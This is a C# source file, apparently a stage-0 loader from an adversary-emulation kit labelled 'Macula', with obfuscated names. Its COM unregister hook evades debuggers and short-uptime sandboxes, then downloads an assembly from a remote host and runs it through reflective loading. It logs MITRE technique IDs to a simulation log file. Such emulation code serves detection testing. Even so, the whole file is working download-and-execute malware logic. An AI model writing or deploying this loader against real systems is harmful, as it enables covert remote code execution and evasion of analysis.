using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Threading;

[ComVisible(true)]
[Guid("5A3D8F1C-B9E4-4A7F-8C2D-1F6E9A3B5C7D")]
public class yqtnwgx
{
    const string kycrx = "Macula-Stage0-6973";
    const string bxfpkh = "MAYAH-S4N";
    const string zmgwlr = "7";
    const string nvfdsi = "https://10.0.0.49";
    const string qjhrwm = "6973";
    const string dvbnl = "https://10.0.0.49/stage/6973-7/3";
    const string gswvji = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    const string txqkyj = @"%APPDATA%\7\macula-simulations.log";

    static bool klsnwzj(string trprw)
    {
        try
        {
            Directory.CreateDirectory(Path.GetDirectoryName(trprw));
            using (StreamWriter htzxnp = File.AppendText(trprw))
            {
                htzxnp.WriteLine($"[{DateTime.Now:yyyy-MM-dd HH:mm:ss.fff}][{bxfpkh}-{kycrx}]: {zmgwlr}-{qjhrwm}-{trprw}=1:");
            }
            return true;
        }
        catch { return false; }
    }

    [ComUnregisterFunction]
    public static void mwxzlpt(Type t)
    {
        if (Debugger.IsAttached || Environment.TickCount < 300000)
            return;

        Thread.Sleep(new Random().Next(1000, 5000));
        byte[] jkrmfq = null;
        string vmptxq = $"{nvfdsi}/{dvbnl}";

        try
        {
            using (WebClient wtdknh = new WebClient())
            {
                wtdknh.Headers["User-Agent"] = gswvji;
                wtdknh.Proxy = null;
                jkrmfq = wtdknh.DownloadData(vmptxq);
                klsnwzj($"T1105|Ingress Tool Transfer=1:");
            }
        }
        catch (Exception ypbhcx)
        {
            klsnwzj($"T1105|Ingress Tool Transfer=0:{ypbhcx.Message.Substring(0, Math.Min(50, ypbhcx.Message.Length))}");
            return;
        }

        try
        {
            Assembly rkqfpw = Assembly.Load(jkrmfq);
            MethodInfo xymvln = rkqfpw.EntryPoint;
            object[] wmvdtx = xymvln.GetParameters().Length == 0 ? null : new object[] { new string[0] };
            xymvln.Invoke(null, wmvdtx);
            klsnwzj($"T1620|Reflective Code Loading=1:");
        }
        catch (Exception prqdhj)
        {
            klsnwzj($"T1620|Reflective Code Loading=0:{prqdhj.Message.Substring(0, Math.Min(50, prqdhj.Message.Length))}");
        }
    }
}